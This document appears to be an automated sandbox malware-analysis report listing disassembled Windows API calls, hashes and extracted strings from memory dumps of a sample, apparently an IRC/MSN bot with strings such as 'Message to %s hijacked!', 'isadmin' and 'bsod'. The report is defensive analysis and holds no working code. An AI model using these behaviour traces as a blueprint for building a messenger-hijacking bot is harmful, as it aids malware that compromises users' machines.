                                                                  • Opcode ID: ff6920a4f34576960947fc1b5a3d0ac86d7dd6ac261b0cca6cf284f5e966243f
                                                                  • Instruction ID: 655e5f0feb57342864bd118bf9991db32f12074da84674c84bcde0045b314480
                                                                  • Opcode Fuzzy Hash: ff6920a4f34576960947fc1b5a3d0ac86d7dd6ac261b0cca6cf284f5e966243f
                                                                  • Instruction Fuzzy Hash: C9F052F0A4030467EB20A7B09C8BFDB3218D310711F10067BF714B22E0E9F88AC08AAD
                                                                  APIs
                                                                  • _snprintf.MSVCRT ref: 0036508F
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 003650A2
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003650AB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateMutexObjectSingleWait_snprintf
                                                                  • String ID: %s-pid
                                                                  • API String ID: 3057366584-2694366501
                                                                  • Opcode ID: 3424791592088aae3a2a1caab2587e50558002dcfcf265069e37afb30e08b7ce
                                                                  • Instruction ID: ec8ef4cb54789c9c04655a3a07dd06083f9e6553e6a5f96ceecd191b7b7eb2fb
                                                                  • Opcode Fuzzy Hash: 3424791592088aae3a2a1caab2587e50558002dcfcf265069e37afb30e08b7ce
                                                                  • Instruction Fuzzy Hash: A9F0E2B2A50208A7EB22A7749C8BF96326C9710711F108666F718A61C4E9B58AC48AA1
                                                                  APIs
                                                                    • Part of subcall function 00407700: memset.MSVCRT ref: 0040771E
                                                                    • Part of subcall function 00407700: _snprintf.MSVCRT ref: 00407738
                                                                    • Part of subcall function 00407700: lstrlenA.KERNEL32(00000000), ref: 00407747
                                                                  • Sleep.KERNEL32(00001388), ref: 0040D78A
                                                                  • Sleep.KERNEL32(00002710), ref: 0040D795
                                                                  • ExitProcess.KERNEL32 ref: 0040D799
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep$ExitProcess_snprintflstrlenmemset
                                                                  • String ID: bsod
                                                                  • API String ID: 706155222-1315366068
                                                                  • Opcode ID: 5388deed1a02275c41a8fd53f22eb3b9fef4c2e063f1b81cc4663499f754aae8
                                                                  • Instruction ID: 29af33aa6d3d1f262d87ea6fb0a6dfe9123b99fa97d7c71365f1f2103470005d
                                                                  • Opcode Fuzzy Hash: 5388deed1a02275c41a8fd53f22eb3b9fef4c2e063f1b81cc4663499f754aae8
                                                                  • Instruction Fuzzy Hash: 77D05E71D84230A3D22123A56C0AF8B59209F40F61F164232EA05BB5E0C5A8298684EE
                                                                  APIs
                                                                    • Part of subcall function 00367700: memset.MSVCRT ref: 0036771E
                                                                    • Part of subcall function 00367700: _snprintf.MSVCRT ref: 00367738
                                                                    • Part of subcall function 00367700: lstrlenA.KERNEL32(00000000), ref: 00367747
                                                                  • Sleep.KERNEL32(00001388), ref: 0036D78A
                                                                  • Sleep.KERNEL32(00002710), ref: 0036D795
                                                                  • ExitProcess.KERNEL32 ref: 0036D799
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep$ExitProcess_snprintflstrlenmemset
                                                                  • String ID: bsod
                                                                  • API String ID: 706155222-1315366068
                                                                  • Opcode ID: a0fd5bf2ebf4530a77b98c455f3b5272493f2fc3dc76b1516cf7e70036dace40
                                                                  • Instruction ID: f3e2d958bb690e665032387763d646ec105b4383e61970dd9fbcc2d3b0047112
                                                                  • Opcode Fuzzy Hash: a0fd5bf2ebf4530a77b98c455f3b5272493f2fc3dc76b1516cf7e70036dace40
                                                                  • Instruction Fuzzy Hash: 80D05EB2A9423063D233276A1C0AF5B59689F40F61F468210E909AB5988595698184E6
                                                                  APIs
                                                                    • Part of subcall function 00407330: memset.MSVCRT ref: 00407351
                                                                    • Part of subcall function 00407330: lstrlenA.KERNEL32(?), ref: 00407369
                                                                    • Part of subcall function 00407330: _snprintf.MSVCRT ref: 00407381
                                                                    • Part of subcall function 00407330: _vsnprintf.MSVCRT ref: 004073A3
                                                                    • Part of subcall function 00407330: lstrlenA.KERNEL32(00000000), ref: 004073B2
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000D760,00000000,00000000,00000000), ref: 0040E861
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E868
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CloseCreateHandleThread_snprintf_vsnprintfmemset
                                                                  • String ID: admin$isadmin
                                                                  • API String ID: 3136305548-1977506819
                                                                  • Opcode ID: 8b8f0a5b3d5e5b2fa0b53b3b26b7233dacb213c356718c0c7739795dadb7a47b
                                                                  • Instruction ID: 3b6143c26c68504e08692baad0537c2f2dacd248f620d2e63fa73881cbd2d311
                                                                  • Opcode Fuzzy Hash: 8b8f0a5b3d5e5b2fa0b53b3b26b7233dacb213c356718c0c7739795dadb7a47b
                                                                  • Instruction Fuzzy Hash: 66D0E975BD5340B6F56027A05E0FF4965545728F06F208432BB05F91D1E6E8709455AD
APIs
  • Part of subcall function 00367330: memset.MSVCRT ref: 00367351
  • Part of subcall function 00367330: lstrlenA.KERNEL32(?), ref: 00367369
  • Part of subcall function 00367330: _snprintf.MSVCRT ref: 00367381
  • Part of subcall function 00367330: _vsnprintf.MSVCRT ref: 003673A3
  • Part of subcall function 00367330: lstrlenA.KERNEL32(00000000), ref: 003673B2
• CreateThread.KERNEL32(00000000,00000000,Function_0000D760,00000000,00000000,00000000), ref: 0036E861
• CloseHandle.KERNEL32(00000000), ref: 0036E868
Strings
Memory Dump Source
• Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_360000_25F.jbxd
Similarity
• API ID: lstrlen$CloseCreateHandleThread_snprintf_vsnprintfmemset
• String ID: admin$isadmin
APIs
  • Part of subcall function 00402460: GetProcessHeap.KERNEL32(?,004020DE,?), ref: 0040246C
  • Part of subcall function 00402460: HeapAlloc.KERNEL32(?,00000008,004020DE,?,004020DE,?), ref: 0040247E
• inet_addr.WS2_32(?), ref: 004028BE
• DnsQuery_A.DNSAPI(?,00000001,00000008,00000000,?,00000000), ref: 00402939
• _stricmp.MSVCRT(?,?,?), ref: 0040294E
• DnsFree.DNSAPI(?,00000001), ref: 004029D9
Memory Dump Source
• Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_25F.jbxd
Similarity
• API ID: Heap$AllocFreeProcessQuery__stricmpinet_addr
APIs
  • Part of subcall function 00362460: GetProcessHeap.KERNEL32(?,003620DE,?), ref: 0036246C
  • Part of subcall function 00362460: HeapAlloc.KERNEL32(?,00000008,003620DE,?,003620DE,?), ref: 0036247E
• inet_addr.WS2_32(?), ref: 003628BE
• DnsQuery_A.DNSAPI(?,00000001,00000008,00000000,?,00000000), ref: 00362939
• _stricmp.MSVCRT(?,?,?), ref: 0036294E
• DnsFree.DNSAPI(?,00000001), ref: 003629D9
Memory Dump Source
• Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_360000_25F.jbxd
Similarity
• API ID: Heap$AllocFreeProcessQuery__stricmpinet_addr
APIs
• ApplyControlToken.SECUR32(?,?), ref: 00408FB5
• InitializeSecurityContextA.SECUR32(?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 00408FF9
• DeleteSecurityContext.SECUR32(?,?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 00409025
• FreeCredentialsHandle.SECUR32(?), ref: 0040902F
  • Part of subcall function 00408760: FreeContextBuffer.SECUR32(?), ref: 00408774
Memory Dump Source
• Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_25F.jbxd
Similarity
• API ID: Context$FreeSecurity$ApplyBufferControlCredentialsDeleteHandleInitializeToken
APIs
• ApplyControlToken.SECUR32(?,?), ref: 00368FB5
• InitializeSecurityContextA.SECUR32(?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 00368FF9
• DeleteSecurityContext.SECUR32(?,?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 00369025
• FreeCredentialsHandle.SECUR32(?), ref: 0036902F
  • Part of subcall function 00368760: FreeContextBuffer.SECUR32(?), ref: 00368774
Memory Dump Source
• Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_360000_25F.jbxd
Similarity
• API ID: Context$FreeSecurity$ApplyBufferControlCredentialsDeleteHandleInitializeToken
APIs
• WaitForSingleObject.KERNEL32(00407495,000000FF,?,00000000,756F59EB,?,00407495), ref: 00404939
• ReleaseMutex.KERNEL32(?,?,00407495), ref: 0040497C
• ReleaseMutex.KERNEL32(-0000FFFF,?,00407495), ref: 004049A5
• ReleaseMutex.KERNEL32(00407495,?,00407495), ref: 004049D1
Memory Dump Source
• Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_25F.jbxd
Similarity
• API ID: MutexRelease$ObjectSingleWait
APIs
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,756F59EB,?,004073CC,00437C98,00000000,00000000,00000010,00000000), ref: 00404A10
• ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 00404A77
• ReleaseMutex.KERNEL32(?,?,?,00000000), ref: 00404AA9
• ReleaseMutex.KERNEL32(?,00000000), ref: 00404ABC
Memory Dump Source
• Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_25F.jbxd
Similarity
• API ID: MutexRelease$ObjectSingleWait
APIs
• WaitForSingleObject.KERNEL32(00367495,000000FF,?,00000000,756F59EB,?,00367495), ref: 00364939
• ReleaseMutex.KERNEL32(?,?,00367495), ref: 0036497C
• ReleaseMutex.KERNEL32(-0000FFFF,?,00367495), ref: 003649A5
• ReleaseMutex.KERNEL32(00367495,?,00367495), ref: 003649D1
Memory Dump Source
• Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_360000_25F.jbxd
Similarity
• API ID: MutexRelease$ObjectSingleWait
APIs
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,756F59EB,?,003673CC,00397C98,00000000,00000000,00000010,00000000), ref: 00364A10
• ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 00364A77
• ReleaseMutex.KERNEL32(?,?,?,00000000), ref: 00364AA9
• ReleaseMutex.KERNEL32(?,00000000), ref: 00364ABC
Memory Dump Source
• Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_360000_25F.jbxd
Similarity
• API ID: MutexRelease$ObjectSingleWait
APIs
• memset.MSVCRT ref: 004011E1
• GetFileAttributesA.KERNEL32(?), ref: 00401201
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000208), ref: 00401241
• ExitThread.KERNEL32 ref: 00401261
Memory Dump Source
• Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_25F.jbxd
Similarity
• API ID: AttributesByteCharExitFileMultiThreadWidememset
APIs
• memset.MSVCRT ref: 003611E1
• GetFileAttributesA.KERNEL32(?), ref: 00361201
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000208), ref: 00361241
• ExitThread.KERNEL32 ref: 00361261
Memory Dump Source
• Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_360000_25F.jbxd
Similarity
• API ID: AttributesByteCharExitFileMultiThreadWidememset
APIs
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 0040D6FD
• RegSetValueExW.ADVAPI32 ref: 0040D731
• RegCloseKey.ADVAPI32(?), ref: 0040D740
• RegCloseKey.ADVAPI32(?), ref: 0040D753
Memory Dump Source
• Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_25F.jbxd
Similarity
• API ID: Close$CreateValue
APIs
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 0036D6FD
• RegSetValueExW.ADVAPI32 ref: 0036D731
• RegCloseKey.ADVAPI32(?), ref: 0036D740
• RegCloseKey.ADVAPI32(?), ref: 0036D753
Memory Dump Source
• Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_360000_25F.jbxd
Similarity
• API ID: Close$CreateValue
APIs
Memory Dump Source
• Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_25F.jbxd
Similarity
• API ID: FreeLocal$closesocket
APIs
Memory Dump Source
• Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_360000_25F.jbxd
Similarity
• API ID: FreeLocal$closesocket
APIs
Memory Dump Source
• Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_25F.jbxd
Similarity
• API ID: strchr$CountSleepTick
APIs
Memory Dump Source
• Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_360000_25F.jbxd
Similarity
• API ID: strchr$CountSleepTick
                                                                  • String ID:
                                                                  • API String ID: 735077530-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: strchr$CountSleepTick
                                                                  • String ID:
                                                                  • API String ID: 735077530-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: strchr$CountSleepTick
                                                                  • String ID:
                                                                  • API String ID: 735077530-0
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040A0A2
                                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0040A0C0
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A0CB
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A0D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CloseFileHandle$CreateWrite
                                                                  • String ID:
                                                                  • API String ID: 3602564925-0
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0036A0A2
                                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0036A0C0
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036A0CB
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036A0D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CloseFileHandle$CreateWrite
                                                                  • String ID:
                                                                  • API String ID: 3602564925-0
                                                                  APIs
                                                                    • Part of subcall function 00404900: WaitForSingleObject.KERNEL32(00407495,000000FF,?,00000000,756F59EB,?,00407495), ref: 00404939
                                                                    • Part of subcall function 00404900: ReleaseMutex.KERNEL32(?,?,00407495), ref: 0040497C
                                                                  • lstrlenA.KERNEL32(00000000,00000000,%s.p10-> Message to %s hijacked!,msn), ref: 004108B1
                                                                    • Part of subcall function 00407330: memset.MSVCRT ref: 00407351
                                                                    • Part of subcall function 00407330: lstrlenA.KERNEL32(?), ref: 00407369
                                                                    • Part of subcall function 00407330: _snprintf.MSVCRT ref: 00407381
                                                                    • Part of subcall function 00407330: _vsnprintf.MSVCRT ref: 004073A3
                                                                    • Part of subcall function 00407330: lstrlenA.KERNEL32(00000000), ref: 004073B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$MutexObjectReleaseSingleWait_snprintf_vsnprintfmemset
                                                                  • String ID: %s_0x%08X$bmsn$msnmsg
                                                                  • API String ID: 1310428588-4225137719
                                                                  APIs
                                                                    • Part of subcall function 00364900: WaitForSingleObject.KERNEL32(00367495,000000FF,?,00000000,756F59EB,?,00367495), ref: 00364939
                                                                    • Part of subcall function 00364900: ReleaseMutex.KERNEL32(?,?,00367495), ref: 0036497C
                                                                  • lstrlenA.KERNEL32(00000000,00000000,%s.p10-> Message to %s hijacked!,msn), ref: 003708B1
                                                                    • Part of subcall function 00367330: memset.MSVCRT ref: 00367351
                                                                    • Part of subcall function 00367330: lstrlenA.KERNEL32(?), ref: 00367369
                                                                    • Part of subcall function 00367330: _snprintf.MSVCRT ref: 00367381
                                                                    • Part of subcall function 00367330: _vsnprintf.MSVCRT ref: 003673A3
                                                                    • Part of subcall function 00367330: lstrlenA.KERNEL32(00000000), ref: 003673B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$MutexObjectReleaseSingleWait_snprintf_vsnprintfmemset
                                                                  • String ID: %s_0x%08X$bmsn$msnmsg
                                                                  • API String ID: 1310428588-4225137719
                                                                  APIs
                                                                    • Part of subcall function 00404900: WaitForSingleObject.KERNEL32(00407495,000000FF,?,00000000,756F59EB,?,00407495), ref: 00404939
                                                                    • Part of subcall function 00404900: ReleaseMutex.KERNEL32(?,?,00407495), ref: 0040497C
                                                                  • lstrlenA.KERNEL32(00000000,?,?,00402696), ref: 0041084B
                                                                    • Part of subcall function 004073E0: memset.MSVCRT ref: 00407401
                                                                    • Part of subcall function 004073E0: memset.MSVCRT ref: 00407419
                                                                    • Part of subcall function 004073E0: lstrlenA.KERNEL32(?), ref: 00407431
                                                                    • Part of subcall function 004073E0: _snprintf.MSVCRT ref: 00407449
                                                                    • Part of subcall function 004073E0: _vsnprintf.MSVCRT ref: 0040746B
                                                                    • Part of subcall function 004073E0: lstrlenA.KERNEL32(?), ref: 0040747A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$memset$MutexObjectReleaseSingleWait_snprintf_vsnprintf
                                                                  • String ID: %s_0x%08X$bmsn$msnmsg
                                                                  • API String ID: 3682388603-4225137719
                                                                  APIs
                                                                    • Part of subcall function 00364900: WaitForSingleObject.KERNEL32(00367495,000000FF,?,00000000,756F59EB,?,00367495), ref: 00364939
                                                                    • Part of subcall function 00364900: ReleaseMutex.KERNEL32(?,?,00367495), ref: 0036497C
                                                                  • lstrlenA.KERNEL32(00000000,?,?,00362696), ref: 0037084B
                                                                    • Part of subcall function 003673E0: memset.MSVCRT ref: 00367401
                                                                    • Part of subcall function 003673E0: memset.MSVCRT ref: 00367419
                                                                    • Part of subcall function 003673E0: lstrlenA.KERNEL32(?), ref: 00367431
                                                                    • Part of subcall function 003673E0: _snprintf.MSVCRT ref: 00367449
                                                                    • Part of subcall function 003673E0: _vsnprintf.MSVCRT ref: 0036746B
                                                                    • Part of subcall function 003673E0: lstrlenA.KERNEL32(?), ref: 0036747A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$memset$MutexObjectReleaseSingleWait_snprintf_vsnprintf
                                                                  • String ID: %s_0x%08X$bmsn$msnmsg
                                                                  • API String ID: 3682388603-4225137719
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040B9AF
                                                                  • EnterCriticalSection.KERNEL32(0044A6C8,?,?,00000000), ref: 0040B9BC
                                                                  • wvsprintfA.USER32(00000000,?,00000000), ref: 0040B9D1
                                                                    • Part of subcall function 00408B30: memset.MSVCRT ref: 00408B6E
                                                                  • LeaveCriticalSection.KERNEL32(0044A6C8,?,?,?,?,?,00000000), ref: 0040B9F2
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionmemset$EnterLeavewvsprintf
                                                                  • String ID:
                                                                  • API String ID: 2410102678-0
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036B9AF
                                                                  • EnterCriticalSection.KERNEL32(003AA6C8,?,?,00000000), ref: 0036B9BC
                                                                  • wvsprintfA.USER32(00000000,?,00000000), ref: 0036B9D1
                                                                    • Part of subcall function 00368B30: memset.MSVCRT ref: 00368B6E
                                                                  • LeaveCriticalSection.KERNEL32(003AA6C8,?,?,?,?,?,00000000), ref: 0036B9F2
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionmemset$EnterLeavewvsprintf
                                                                  • String ID:
                                                                  • API String ID: 2410102678-0
                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000DD20,00000000,00000000,00000000), ref: 0040E9BF
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040E9C6
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E9C9
                                                                  • Sleep.KERNEL32(0000EA60), ref: 0040E9D4
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleObjectSingleSleepThreadWait
                                                                  • String ID:
                                                                  • API String ID: 422747524-0
                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000DD20,00000000,00000000,00000000), ref: 0036E9BF
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0036E9C6
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036E9C9
                                                                  • Sleep.KERNEL32(0000EA60), ref: 0036E9D4
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleObjectSingleSleepThreadWait
                                                                  • String ID:
                                                                  • API String ID: 422747524-0
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040BA1E
                                                                  • wvsprintfA.USER32(00000000,00000000,00000000), ref: 0040BA42
                                                                    • Part of subcall function 0040B990: memset.MSVCRT ref: 0040B9AF
                                                                    • Part of subcall function 0040B990: EnterCriticalSection.KERNEL32(0044A6C8,?,?,00000000), ref: 0040B9BC
                                                                    • Part of subcall function 0040B990: wvsprintfA.USER32(00000000,?,00000000), ref: 0040B9D1
                                                                    • Part of subcall function 0040B990: LeaveCriticalSection.KERNEL32(0044A6C8,?,?,?,?,?,00000000), ref: 0040B9F2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionmemsetwvsprintf$EnterLeave
                                                                  • String ID: PPPPMSG %s :%s
                                                                  • API String ID: 3980427996-569775469
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036BA1E
                                                                  • wvsprintfA.USER32(00000000,00000000,00000000), ref: 0036BA42
                                                                    • Part of subcall function 0036B990: memset.MSVCRT ref: 0036B9AF
                                                                    • Part of subcall function 0036B990: EnterCriticalSection.KERNEL32(003AA6C8,?,?,00000000), ref: 0036B9BC
                                                                    • Part of subcall function 0036B990: wvsprintfA.USER32(00000000,?,00000000), ref: 0036B9D1
                                                                    • Part of subcall function 0036B990: LeaveCriticalSection.KERNEL32(003AA6C8,?,?,?,?,?,00000000), ref: 0036B9F2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionmemsetwvsprintf$EnterLeave
                                                                  • String ID: PPPPMSG %s :%s
                                                                  • API String ID: 3980427996-569775469
                                                                  • Opcode ID: 576a1b6b1eb05e07d1258a3968d4cd3cdc05e6628b22d3f853ea39cd537623b4
                                                                  • Instruction ID: ef96653c0a5acf0bd10ec38d7d4173b7e757c294ddd5352cf5c728dd8f421e26
                                                                  • Opcode Fuzzy Hash: 576a1b6b1eb05e07d1258a3968d4cd3cdc05e6628b22d3f853ea39cd537623b4
                                                                  • Instruction Fuzzy Hash: F7F096B5D00109ABDB25EB54DC45FA6737CFB44700F0481A5F90C97141FB74AA58CFA1
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: gethostbynameinet_addr
                                                                  • String ID: n"@
                                                                  • API String ID: 1594361348-1818638472
